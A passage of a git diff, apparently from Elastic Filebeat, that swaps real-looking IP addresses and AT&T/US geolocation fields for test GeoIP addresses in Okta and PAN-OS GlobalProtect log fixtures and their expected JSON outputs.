Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"Evaluation of sign-on policy\",\"eventType\":\"policy.evaluate_sign_on\",\"legacyEventType\":null,\"outcome\":{\"reason\":\"Sign-on policy evaluation resulted in ALLOW\",\"result\":\"ALLOW\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"67.43.156.12\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":[{\"alternateId\":\"unknown\",\"detailEntry\":{\"policyType\":\"OktaSignOn\"},\"displayName\":\"Default Policy\",\"id\":\"00p1abvweGGDW10Ur4x6\",\"type\":\"PolicyEntity\"},{\"alternateId\":\"00p1abvweGGDW10Ur4x6\",\"detailEntry\":null,\"displayName\":\"Default Rule\",\"id\":\"0pr1abvwfqGFI4n064x6\",\"type\":\"PolicyRule\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3af594f9-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}",
         "event.outcome": "success",
         "event.type": [
             "info"
         ],
         "fileset.name": "system",
         "input.type": "log",
-        "log.offset": 3287,
+        "log.offset": 3275,
         "okta.actor.alternate_id": "xxxxxx@elastic.co",
         "okta.actor.display_name": "xxxxxx",
         "okta.actor.id": "00u1abvz4pYqdM8ms4x6",
@@ -202,7 +194,7 @@
         "okta.authentication_context.authentication_step": 0,
         "okta.authentication_context.external_session_id": "102bZDNFfWaQSyEZQuDgWt-uQ",
         "okta.client.device": "Computer",
-        "okta.client.ip": "108.255.197.247",
+        "okta.client.ip": "67.43.156.12",
         "okta.client.user_agent.browser": "FIREFOX",
         "okta.client.user_agent.os": "Mac OS X",
         "okta.client.user_agent.raw_user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0",
@@ -234,23 +226,19 @@
         "okta.transaction.type": "WEB",
         "okta.uuid": "3af594f9-4f67-11ea-abd3-1f5d113f2546",
         "related.ip": [
-            "108.255.197.247"
+            "67.43.156.12"
         ],
         "related.user": [
             "xxxxxx"
         ],
         "service.type": "okta",
-        "source.as.number": 7018,
-        "source.as.organization.name": "AT&T Services, Inc.",
-        "source.geo.city_name": "Dublin",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.7201,
-        "source.geo.location.lon": -121.919,
-        "source.geo.region_iso_code": "US-CA",
-        "source.geo.region_name": "California",
-        "source.ip": "108.255.197.247",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "source.user.full_name": "xxxxxx",
         "source.user.id": "00u1abvz4pYqdM8ms4x6",
         "tags": [
@@ -274,7 +262,7 @@
         "client.geo.location.lat": 37.7201,
         "client.geo.location.lon": -121.919,
         "client.geo.region_name": "California",
-        "client.ip": "108.255.197.247",
+        "client.ip": "67.43.156.12",
         "client.user.full_name": "xxxxxx",
         "client.user.id": "00u1abvz4pYqdM8ms4x6",
         "event.action": "policy.evaluate_sign_on",
@@ -285,14 +273,14 @@
         "event.id": "36a3b6b3-fcc0-47a0-96bd-95330cfdb658",
         "event.kind": "event",
         "event.module": "okta",
-        "event.original": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"<random_id_string>\",\"requestUri\":\"<uri_endpoint>\",\"threatSuspected\":\"false\",\"url\":\"<url>\",\"suspiciousActivityBrowser\":\"browser\",\"suspiciousActivityEventCity\":\"New York City\",\"suspiciousActivityEventCountry\":\"United Sates\",\"suspiciousActivityEventId\":\"1234567\",\"suspiciousActivityEventIp\":\"10.50.14.5\",\"suspiciousActivityEventLatitude\":\"40.744960\",\"suspiciousActivityEventLongitude\":\"-73.988590\",\"suspiciousActivityEventState\":\"New York\",\"suspiciousActivityEventTransactionId\":\"12345678900\",\"suspiciousActivityEventType\":\"system.email.new_device_notification.sent_message\",\"suspiciousActivityOs\":\"Windows 10\",\"suspiciousActivityTimestamp\":\"2021-05-08T21:50:16.594Z\"}},\"displayMessage\":\"Evaluation of sign-on policy\",\"eventType\":\"policy.evaluate_sign_on\",\"legacyEventType\":null,\"outcome\":{\"reason\":\"Sign-on policy evaluation resulted in ALLOW\",\"result\":\"ALLOW\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":[{\"alternateId\":\"unknown\",\"detailEntry\":{\"policyType\":\"OktaSignOn\"},\"displayName\":\"Default Policy\",\"id\":\"00p1abvweGGDW10Ur4x6\",\"type\":\"PolicyEntity\"},{\"alternateId\":\"00p1abvweGGDW10Ur4x6\",\"detailEntry\":null,\"displayName\":\"Default Rule\",\"id\":\"0pr1abvwfqGFI4n064x6\",\"type\":\"PolicyRule\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"36a3b6b3-fcc0-47a0-96bd-95330cfdb658\",\"version\":\"0\"}",
+        "event.original": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"67.43.156.12\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"<random_id_string>\",\"requestUri\":\"<uri_endpoint>\",\"threatSuspected\":\"false\",\"url\":\"<url>\",\"suspiciousActivityBrowser\":\"browser\",\"suspiciousActivityEventCity\":\"New York City\",\"suspiciousActivityEventCountry\":\"United Sates\",\"suspiciousActivityEventId\":\"1234567\",\"suspiciousActivityEventIp\":\"10.50.14.5\",\"suspiciousActivityEventLatitude\":\"40.744960\",\"suspiciousActivityEventLongitude\":\"-73.988590\",\"suspiciousActivityEventState\":\"New York\",\"suspiciousActivityEventTransactionId\":\"12345678900\",\"suspiciousActivityEventType\":\"system.email.new_device_notification.sent_message\",\"suspiciousActivityOs\":\"Windows 10\",\"suspiciousActivityTimestamp\":\"2021-05-08T21:50:16.594Z\"}},\"displayMessage\":\"Evaluation of sign-on policy\",\"eventType\":\"policy.evaluate_sign_on\",\"legacyEventType\":null,\"outcome\":{\"reason\":\"Sign-on policy evaluation resulted in ALLOW\",\"result\":\"ALLOW\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"67.43.156.12\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":[{\"alternateId\":\"unknown\",\"detailEntry\":{\"policyType\":\"OktaSignOn\"},\"displayName\":\"Default Policy\",\"id\":\"00p1abvweGGDW10Ur4x6\",\"type\":\"PolicyEntity\"},{\"alternateId\":\"00p1abvweGGDW10Ur4x6\",\"detailEntry\":null,\"displayName\":\"Default Rule\",\"id\":\"0pr1abvwfqGFI4n064x6\",\"type\":\"PolicyRule\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"36a3b6b3-fcc0-47a0-96bd-95330cfdb658\",\"version\":\"0\"}",
         "event.outcome": "success",
         "event.type": [
             "info"
         ],
         "fileset.name": "system",
         "input.type": "log",
-        "log.offset": 5218,
+        "log.offset": 5200,
         "okta.actor.alternate_id": "xxxxxx@elastic.co",
         "okta.actor.display_name": "xxxxxx",
         "okta.actor.id": "00u1abvz4pYqdM8ms4x6",
@@ -300,7 +288,7 @@
         "okta.authentication_context.authentication_step": 0,
         "okta.authentication_context.external_session_id": "102bZDNFfWaQSyEZQuDgWt-uQ",
         "okta.client.device": "Computer",
-        "okta.client.ip": "108.255.197.247",
+        "okta.client.ip": "67.43.156.12",
         "okta.client.user_agent.browser": "FIREFOX",
         "okta.client.user_agent.os": "Mac OS X",
         "okta.client.user_agent.raw_user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0",
@@ -344,23 +332,19 @@
         "okta.transaction.type": "WEB",
         "okta.uuid": "36a3b6b3-fcc0-47a0-96bd-95330cfdb658",
         "related.ip": [
-            "108.255.197.247"
+            "67.43.156.12"
         ],
         "related.user": [
             "xxxxxx"
         ],
         "service.type": "okta",
-        "source.as.number": 7018,
-        "source.as.organization.name": "AT&T Services, Inc.",
-        "source.geo.city_name": "Dublin",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.7201,
-        "source.geo.location.lon": -121.919,
-        "source.geo.region_iso_code": "US-CA",
-        "source.geo.region_name": "California",
-        "source.ip": "108.255.197.247",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "source.user.full_name": "xxxxxx",
         "source.user.id": "00u1abvz4pYqdM8ms4x6",
         "tags": [
@@ -385,7 +369,7 @@
         "client.geo.location.lat": 37.7201,
         "client.geo.location.lon": -121.919,
         "client.geo.region_name": "California",
-        "client.ip": "108.255.197.247",
+        "client.ip": "67.43.156.12",
         "client.user.full_name": "xxxxxx",
         "client.user.id": "00u1abvz4pYqdM8ms4x6",
         "event.action": "user.account.report_suspicious_activity_by_enduser",
@@ -393,11 +377,11 @@
         "event.id": "c2adb364-88d1-45a9-a620-2b64e44c5fcf",
         "event.kind": "event",
         "event.module": "okta",
-        "event.original": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"requestId\":\"<random_id_string>\",\"requestUri\":\"<uri_endpoint>\",\"suspiciousActivityBrowser\":\"browser\",\"suspiciousActivityEventCity\":\"New York City\",\"suspiciousActivityEventCountry\":\"United States\",\"suspiciousActivityEventId\":\"1234567\",\"suspiciousActivityEventIp\":\"10.50.14.5\",\"suspiciousActivityEventLatitude\":\"40.744960\",\"suspiciousActivityEventLongitude\":\"-73.988590\",\"suspiciousActivityEventState\":\"New York\",\"suspiciousActivityEventTransactionId\":\"12345678900\",\"suspiciousActivityEventType\":\"system.email.new_device_notification.sent_message\",\"suspiciousActivityOs\":\"Windows 10\",\"suspiciousActivityTimestamp\":\"2021-05-08T21:50:16.594Z\",\"url\":\"<url>\"}},\"device\":null,\"displayMessage\":\"User report suspicious activity\",\"eventType\":\"user.account.report_suspicious_activity_by_enduser\",\"legacyEventType\":\"core.user.account.report_suspicious_activity_by_enduser\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":7018,\"asOrg\":\"AT&T Services, Inc.\",\"domain\":\"att.com\",\"isProxy\":false,\"isp\":\"AT&T Corp.\"},\"severity\":\"WARN\",\"target\":[{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"c2adb364-88d1-45a9-a620-2b64e44c5fcf\",\"version\":\"0\"}",
+        "event.original": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"67.43.156.12\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"requestId\":\"<random_id_string>\",\"requestUri\":\"<uri_endpoint>\",\"suspiciousActivityBrowser\":\"browser\",\"suspiciousActivityEventCity\":\"New York City\",\"suspiciousActivityEventCountry\":\"United States\",\"suspiciousActivityEventId\":\"1234567\",\"suspiciousActivityEventIp\":\"10.50.14.5\",\"suspiciousActivityEventLatitude\":\"40.744960\",\"suspiciousActivityEventLongitude\":\"-73.988590\",\"suspiciousActivityEventState\":\"New York\",\"suspiciousActivityEventTransactionId\":\"12345678900\",\"suspiciousActivityEventType\":\"system.email.new_device_notification.sent_message\",\"suspiciousActivityOs\":\"Windows 10\",\"suspiciousActivityTimestamp\":\"2021-05-08T21:50:16.594Z\",\"url\":\"<url>\"}},\"device\":null,\"displayMessage\":\"User report suspicious activity\",\"eventType\":\"user.account.report_suspicious_activity_by_enduser\",\"legacyEventType\":\"core.user.account.report_suspicious_activity_by_enduser\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"67.43.156.12\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":7018,\"asOrg\":\"AT&T Services, Inc.\",\"domain\":\"att.com\",\"isProxy\":false,\"isp\":\"AT&T Corp.\"},\"severity\":\"WARN\",\"target\":[{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"c2adb364-88d1-45a9-a620-2b64e44c5fcf\",\"version\":\"0\"}",
         "event.outcome": "success",
         "fileset.name": "system",
         "input.type": "log",
-        "log.offset": 7707,
+        "log.offset": 7683,
         "okta.actor.alternate_id": "xxxxxx@elastic.co",
         "okta.actor.display_name": "xxxxxx",
         "okta.actor.id": "00u1abvz4pYqdM8ms4x6",
@@ -405,7 +389,7 @@
         "okta.authentication_context.authentication_step": 0,
         "okta.authentication_context.external_session_id": "102bZDNFfWaQSyEZQuDgWt-uQ",
         "okta.client.device": "Computer",
-        "okta.client.ip": "108.255.197.247",
+        "okta.client.ip": "67.43.156.12",
         "okta.client.user_agent.browser": "FIREFOX",
         "okta.client.user_agent.os": "Mac OS X",
         "okta.client.user_agent.raw_user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0",
@@ -443,24 +427,20 @@
         "okta.transaction.type": "WEB",
         "okta.uuid": "c2adb364-88d1-45a9-a620-2b64e44c5fcf",
         "related.ip": [
-            "108.255.197.247"
+            "67.43.156.12"
         ],
         "related.user": [
             "xxxxxx"
         ],
         "service.type": "okta",
-        "source.as.number": 7018,
-        "source.as.organization.name": "AT&T Services, Inc.",
+        "source.as.number": 35908,
         "source.domain": "att.com",
-        "source.geo.city_name": "Dublin",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.7201,
-        "source.geo.location.lon": -121.919,
-        "source.geo.region_iso_code": "US-CA",
-        "source.geo.region_name": "California",
-        "source.ip": "108.255.197.247",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "source.user.full_name": "xxxxxx",
         "source.user.id": "00u1abvz4pYqdM8ms4x6",
         "tags": [
diff --git a/x-pack/filebeat/module/panw/panos/test/global_protect.log b/x-pack/filebeat/module/panw/panos/test/global_protect.log
index fdb7add640d4..23b982e2a09a 100644
--- a/x-pack/filebeat/module/panw/panos/test/global_protect.log
+++ b/x-pack/filebeat/module/panw/panos/test/global_protect.log
@@ -1,10 +1,10 @@
 1,2021/03/24 11:30:00,013101001305,GLOBALPROTECT,0,2305,2021/03/24 11:30:00,vsys1,portal-prelogin,before-login,,,,BE,,11.134.5.168,0.0.0.0,10.52.36.15,0.0.0.0,09300bcc-23-4900-8de9-32695452fa,,5.2.4,Windows,"Microsoft Windows 10 Pro , 64-bit",1,,,"",success,,0,,0,GlobalProtect Portal,69200719497738,0x0
 1,2021/03/24 11:29:49,013101001308,GLOBALPROTECT,0,2305,2021/03/24 11:29:49,vsys1,gateway-config-release,configuration,,,domain\user,BE,CP935,83.14.113.11,0.0.0.0,10.20.13.217,0.0.0.0,e0957c11-93-437a-9e23-9f0c24059898,5J9VN53,5.2.4,Windows,"Microsoft Windows 10 Pro , 64-bit",1,,,"",success,,0,,0,GlobalProtect_GW,6919501582016786,0x0
-1,2021/04/07 17:41:30,013101305,GLOBALPROTECT,0,2305,2021/04/07 17:41:30,vsys1,gateway-hip-check,host-info,,,domain\user1,,HOST82878,7.2.2.193,0.0.0.0,12.30.0.210,0.0.0.0,523e8b-7efa-4397-a4d5-824dfa4d8a,F1SM2,5.2.4,,"",1,,,"HIP report is not needed",success,,0,,0,GlobalProtect_GW,6920071768563516860,0x0
-1,2021/04/07 17:41:29,013101308,GLOBALPROTECT,0,2305,2021/04/07 17:41:29,vsys1,gateway-getconfig,configuration,,IPSec,pre-logon,BE,HOST73486,7.2.2.171,0.0.0.0,1.40.2.67,0.0.0.0,7d01b5-f538-4fa3-a2a2-83980d1325,5C261FNR,5.2.4,Windows,"Microsoft Windows 10 Pro , 64-bit",1,,,"Config name: , Client region: BE.",success,,0,,0,GlobalProtect_GW,6944137135219737,0x0
+1,2021/04/07 17:41:30,013101305,GLOBALPROTECT,0,2305,2021/04/07 17:41:30,vsys1,gateway-hip-check,host-info,,,domain\user1,,HOST82878,7.2.2.193,0.0.0.0,67.43.156.14,0.0.0.0,523e8b-7efa-4397-a4d5-824dfa4d8a,F1SM2,5.2.4,,"",1,,,"HIP report is not needed",success,,0,,0,GlobalProtect_GW,6920071768563516860,0x0
+1,2021/04/07 17:41:29,013101308,GLOBALPROTECT,0,2305,2021/04/07 17:41:29,vsys1,gateway-getconfig,configuration,,IPSec,pre-logon,BE,HOST73486,7.2.2.171,0.0.0.0,81.2.69.193,0.0.0.0,7d01b5-f538-4fa3-a2a2-83980d1325,5C261FNR,5.2.4,Windows,"Microsoft Windows 10 Pro , 64-bit",1,,,"Config name: , Client region: BE.",success,,0,,0,GlobalProtect_GW,6944137135219737,0x0
 1,2021/04/07 17:41:28,0131001309,GLOBALPROTECT,0,2305,2021/04/07 17:41:28,vsys1,gateway-tunnel-latency,tunnel,,,,userlterso,HOSTP92413,7.2.17.120,0.0.0.0,0.0.0.0,0.0.0.0,2ba9f01-b83b-4902-a1fb-1748c0365,GJG98Y2,5.2.4,,"",1,,,"Pre-tunnel latency: 67ms, Post-tunnel latency: 47ms",success,,0,,0,GlobalProtect_GW,6920071768563516847,0x0
 1,2021/03/02 09:55:42,12345678999,GLOBALPROTECT,0,2305,2021/03/02 09:55:39,vsys1,gateway-auth,login,Other,,maxmustermann,10.0.0.0-10.255.255.255,PC1234,10.20.30.40,0.0.0.0,0.0.0.0,0.0.0.0,985e865f-7da3-43b4-89a9-299b1bb0c975,SERIALNR,5.1.1,Windows,"Microsoft Windows 10 Enterprise, 64-bit",1,,,,success,,0,pre-logon,0,GP GW intern,6894571632887748064,0x8000000000000000,1970-01-01T01:00:00.000+01:00,,0,manual only,,
-1,2021/03/02 11:01:03,123456789999,GLOBALPROTECT,0,2305,2021/03/02 11:01:02,vsys1,gateway-setup-ipsec,tunnel,,IPSec,domain\musterman,DE,Rechner123,123.123.123.123,0.0.0.0,10.20.30.40,0.0.0.0,96c43d47-8bb5-4f78-8dfc-413a189a29e0,SERIALNR,5.1.1,Windows,"Microsoft Windows 10 Enterprise, 64-bit",1,,,,success,,0,,0,GPGateway,6894571632887761989,0x8000000000000000,1970-01-01T01:00:00.000+01:00,,0,manual only,,
+1,2021/03/02 11:01:03,123456789999,GLOBALPROTECT,0,2305,2021/03/02 11:01:02,vsys1,gateway-setup-ipsec,tunnel,,IPSec,domain\musterman,DE,Rechner67.43.156.12.123,0.0.0.0,10.20.30.40,0.0.0.0,96c43d47-8bb5-4f78-8dfc-413a189a29e0,SERIALNR,5.1.1,Windows,"Microsoft Windows 10 Enterprise, 64-bit",1,,,,success,,0,,0,GPGateway,6894571632887761989,0x8000000000000000,1970-01-01T01:00:00.000+01:00,,0,manual only,,
 1,2021/03/02 09:39:33,12345678999,GLOBALPROTECT,0,2305,2021/03/02 09:39:26,vsys1,portal-prelogin,before-login,,,Max.Mustermann@domain.de,10.0.0.0-10.255.255.255,,10.20.30.40,0.0.0.0,0.0.0.0,0.0.0.0,0183d851-7ea2-4a0d-80de-fde1e04ce12f,,5.1.1,Windows,"Microsoft Windows 10 Enterprise, 64-bit",1,,,,success,,0,,0,GP Portal,6894571632887745099,0x8000000000000000,1970-01-01T01:00:00.000+01:00,,0,manual only,,
 1,2021/03/02 09:47:18,12345678999,GLOBALPROTECT,0,2305,2021/03/02 09:47:13,vsys1,portal-getconfig,configuration,,,domain\maxmustermann,10.0.0.0-10.255.255.255,PC12345,10.20.30.40,0.0.0.0,0.0.0.0,0.0.0.0,8cbc136b-e262-4cf8-912c-95ea132d9fef,SERIENNR,5.1.1,Windows,"Microsoft Windows 10 Enterprise, 64-bit",1,,,"Config name: GP Clients, Machine Certificate CN : (null)",success,,0,pre-logon,0,GP Portal,6894571632887746544,0x8000000000000000,1970-01-01T01:00:00.000+01:00,,0,manual only,,
 931201168,2021-10-22T16:10:10.000000Z,no-serial,GLOBALPROTECT,globalprotect,9.1,2021-10-22T16:10:05.000000Z,vsys1,gateway-hip-check,host-info,,,host\\user,,HOSTNAME,10.1.1.1,,10.2.2.2,fc00::1,8cbc136b-e262-4cf8-912c-95ea132d9fef,SERIALNR,5.2.6,,,1,,,HIP report is not needed,success,,0,,0,GlobalProtect_External_Gateway,1305925,true
diff --git a/x-pack/filebeat/module/panw/panos/test/global_protect.log-expected.json b/x-pack/filebeat/module/panw/panos/test/global_protect.log-expected.json
index 876b298f958d..39f636866bad 100644
--- a/x-pack/filebeat/module/panw/panos/test/global_protect.log-expected.json
+++ b/x-pack/filebeat/module/panw/panos/test/global_protect.log-expected.json
@@ -115,19 +115,19 @@
     },
     {
         "@timestamp": "2021-04-07T17:41:30.000-02:00",
-        "client.address": "12.30.0.210",
-        "client.ip": "12.30.0.210",
+        "client.address": "67.43.156.14",
+        "client.ip": "67.43.156.14",
         "client.nat.ip": "7.2.2.193",
         "event.code": "gateway-hip-check",
         "event.dataset": "panw.panos",
         "event.duration": 0,
         "event.module": "panw",
-        "event.original": "1,2021/04/07 17:41:30,013101305,GLOBALPROTECT,0,2305,2021/04/07 17:41:30,vsys1,gateway-hip-check,host-info,,,domain\\user1,,HOST82878,7.2.2.193,0.0.0.0,12.30.0.210,0.0.0.0,523e8b-7efa-4397-a4d5-824dfa4d8a,F1SM2,5.2.4,,\"\",1,,,\"HIP report is not needed\",success,,0,,0,GlobalProtect_GW,6920071768563516860,0x0",
+        "event.original": "1,2021/04/07 17:41:30,013101305,GLOBALPROTECT,0,2305,2021/04/07 17:41:30,vsys1,gateway-hip-check,host-info,,,domain\\user1,,HOST82878,7.2.2.193,0.0.0.0,67.43.156.14,0.0.0.0,523e8b-7efa-4397-a4d5-824dfa4d8a,F1SM2,5.2.4,,\"\",1,,,\"HIP report is not needed\",success,,0,,0,GlobalProtect_GW,6920071768563516860,0x0",
         "event.outcome": "success",
         "event.timezone": "-02:00",
         "fileset.name": "panos",
         "host.id": "523e8b-7efa-4397-a4d5-824dfa4d8a",
-        "host.ip": "12.30.0.210",
+        "host.ip": "67.43.156.14",
         "host.name": "HOST82878",
         "input.type": "log",
         "log.offset": 640,
@@ -154,25 +154,21 @@
             "HOST82878"
         ],
         "related.ip": [
-            "12.30.0.210",
+            "67.43.156.14",
             "7.2.2.193"
         ],
         "related.user": [
             "user1"
         ],
         "service.type": "panw",
-        "source.address": "12.30.0.210",
-        "source.as.number": 7018,
-        "source.as.organization.name": "AT&T Services, Inc.",
-        "source.geo.city_name": "Greenwood",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 39.5992,
-        "source.geo.location.lon": -86.13,
-        "source.geo.region_iso_code": "US-IN",
-        "source.geo.region_name": "Indiana",
-        "source.ip": "12.30.0.210",
+        "source.address": "67.43.156.14",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "source.nat.ip": "7.2.2.193",
         "source.user.domain": "domain",
         "source.user.name": "user1",
@@ -185,24 +181,24 @@
     },
